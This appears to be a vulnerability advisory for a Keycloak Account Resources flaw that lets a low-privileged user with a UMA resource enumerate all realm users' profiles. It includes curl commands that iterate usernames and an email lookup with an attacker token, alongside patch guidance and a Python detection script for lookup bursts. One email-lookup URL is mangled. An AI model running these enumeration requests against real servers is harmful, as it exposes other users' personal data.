A flawed access control in Keycloak’s Account Resources user lookup endpoint allows an authenticated attacker who owns at least one User-Managed Access (UMA) resource to enumerate and leak personal data for all users in a realm. The issue stems from insufficient granularity of access control (CWE‑1220): when a request containing an arbitrary username or email is sent to the endpoint, the system fails to verify whether the authenticated requester actually has permission to access the target user’s profile. Instead of rejecting the lookup, the endpoint returns the full profile object of any matching user, including identifiers, names, email addresses, and other personally identifiable information (PII). This broken access control can be exploited remotely over the network without special conditions, requiring only low‑level privileges (the attacker must be authenticated and have created one UMA resource). The vulnerability affects the core authorization logic of Keycloak, undermining the principle of least privilege and enabling large‑scale user enumeration and privacy violations.
DailyCVE Form:
Platform: Keycloak (RedHat)
Version: before 26.6.2
Vulnerability: Broken Access Control
Severity: Medium (CVSS 4.3)
Date: 2026-05-19
Prediction: 2026-06-10
What Undercode Say:
# Enumerate all realm users by username
for username in user1 user2 admin; do
  curl -X GET "https://keycloak.example.com/auth/realms/demo/account/user?username=$username" \
    -H "Authorization: Bearer $ATTACKER_TOKEN"
done

# Harvest full profiles via email (the email lookup value is obfuscated in the source page)
curl -X GET "https://keycloak.example.com/auth/realms/demo/account/[email protected]" \
  -H "Authorization: Bearer $ATTACKER_TOKEN"
Exploit:
An attacker with a valid session and at least one UMA resource sends crafted GET requests to the vulnerable endpoint, substituting different usernames or email addresses. The endpoint returns the full profile object for each valid user, even though the attacker has no relationship with those users. By iterating over common usernames or email patterns, the attacker can systematically enumerate all realm users and harvest their PII.
Protection:
- Upgrade Keycloak to version 26.6.2 or later (or the back‑ported fix 26.4.12).
- If patching is not immediately possible, restrict or remove unnecessary UMA resources to limit the attack surface.
- Implement strict access control checks that require explicit permission for each user lookup.
- Add rate‑limiting and anomaly detection for repeated user‑lookup attempts.
- Monitor logs for suspicious patterns (e.g., large numbers of user enumeration requests from a single authenticated session).
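As an added detection example (not part of the original advisory), the following Python flags authenticated subjects that look up many distinct users through the account lookup endpoint within a short window. It assumes a constructed reverse-proxy access-log format with the token subject in a `sub=` field; the threshold and window are arbitrary starting points to tune per deployment.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import urlparse, parse_qs
# Constructed sample of proxy access-log lines in front of Keycloak.
# Assumed fields: timestamp, authenticated subject id, method, request URL.
SAMPLE_LOG = """\
2026-05-19T10:00:01Z sub=7c2f GET /auth/realms/demo/account/user?username=user1
2026-05-19T10:00:02Z sub=7c2f GET /auth/realms/demo/account/user?username=user2
2026-05-19T10:00:02Z sub=7c2f GET /auth/realms/demo/account/user?username=admin
2026-05-19T10:00:03Z sub=7c2f GET /auth/realms/demo/account/user?email=alice%40example.com
2026-05-19T10:00:04Z sub=7c2f GET /auth/realms/demo/account/user?email=bob%40example.com
2026-05-19T10:00:05Z sub=7c2f GET /auth/realms/demo/account/user?username=carol
2026-05-19T10:00:09Z sub=9a11 GET /auth/realms/demo/account/user?username=dave
2026-05-19T10:00:10Z sub=9a11 GET /auth/realms/demo/account/
2026-05-19T10:15:00Z sub=7c2f GET /auth/realms/demo/account/user?username=erin
"""
LINE_RE = re.compile(r"^(\S+) sub=(\S+) (\S+) (\S+)$")
LOOKUP_PATH = re.compile(r"^/auth/realms/[^/]+/account/user$")

def parse_lookups(log_text):
    """Yield (timestamp, subject, target) for each user-lookup request."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts, sub, _method, url = m.groups()
        parsed = urlparse(url)
        if not LOOKUP_PATH.match(parsed.path):
            continue  # not the account user-lookup endpoint
        qs = parse_qs(parsed.query)
        target = (qs.get("username") or qs.get("email") or [None])[0]
        if target is None:
            continue  # lookup without a username/email parameter
        yield datetime.fromisoformat(ts.replace("Z", "+00:00")), sub, target.lower()

def flag_enumerators(log_text, window=timedelta(minutes=5), threshold=5):
    """Return {subject: distinct targets} for subjects that looked up at least
    `threshold` distinct users inside any `window`-long sliding interval."""
    per_sub = defaultdict(list)
    for ts, sub, target in parse_lookups(log_text):
        per_sub[sub].append((ts, target))
    flagged = {}
    for sub, events in per_sub.items():
        events.sort()
        for i, (start, _) in enumerate(events):
            targets = {t for ts, t in events[i:] if ts - start <= window}
            if len(targets) >= threshold:
                flagged[sub] = max(flagged.get(sub, 0), len(targets))
    return flagged
```

A flagged subject is a candidate for session revocation and review, since a legitimate account holder has no reason to query many other users' profiles.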
Impact:
- Information Disclosure: Full names, email addresses, and other profile attributes of every user in the realm are exposed.
- Privacy Violations: Leaked PII can be used for identity theft, targeted phishing, credential stuffing, and social engineering.
- Compliance Risks: Organizations may violate GDPR, CCPA, or other data‑protection regulations due to unauthorized data access.
- Reputational Damage: Trust in the authentication system is severely eroded, potentially leading to loss of user confidence and legal liabilities.
Sources:
Reported By: nvd.nist.gov